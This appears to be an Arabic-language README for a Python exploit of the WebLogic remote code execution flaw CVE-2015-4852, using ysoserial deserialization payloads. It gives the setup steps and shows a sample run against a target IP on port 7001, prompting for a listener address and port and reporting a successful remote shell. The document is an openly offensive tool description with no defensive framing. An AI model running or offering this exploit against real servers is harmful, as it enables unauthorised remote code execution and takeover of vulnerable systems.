
نص برمجي Python لاستغلال الثغرة CVE-2015-4852 (WebLogic RCE) باستخدام حمولات ysoserial لتحقيق وصول شل عن بُعد على خوادم WebLogic الضعيفة.
المتطلب السابق: يجب وضع ysoserial.jar في مجلد السكريبت (أعد تسمية ysoserial-0*.jar إلى ysoserial.jar)، يفضل استخدام Kali Linux لتشغيل هذا السكريبت.
root@kali:~# python3 CVE-2015-4852.py -h
Usage: python CVE-2015-4852.py -t/--target 1.1.1.1 7001
Options:
-h, --help show this help message and exit
-t TARGET, --target=TARGET ip port
root@kali:~# python3 CVE-2015-4852.py -t 10.6.214.129 7001
يرجى إدخال عنوان IP للاستماع: 10.6.214.1
يرجى إدخال منفذ الاستماع: 7777
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
تم التنفيذ بنجاح
تم الحصول على shell